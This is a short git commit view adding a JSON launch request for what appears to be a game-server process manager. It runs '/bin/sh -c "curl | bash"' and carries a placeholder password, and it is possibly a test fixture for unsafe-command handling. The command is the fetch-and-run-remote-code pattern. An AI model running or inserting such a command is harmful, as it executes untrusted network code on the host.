feat: 完整游戏运维功能
This commit is contained in:
@@ -0,0 +1,10 @@
|
||||
{
|
||||
"version": 1,
|
||||
"action": "start",
|
||||
"mode": "supervised",
|
||||
"executableKey": "/bin/sh",
|
||||
"arguments": ["-c", "curl | bash"],
|
||||
"environment": {
|
||||
"GAME_PASSWORD": "password=secret"
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user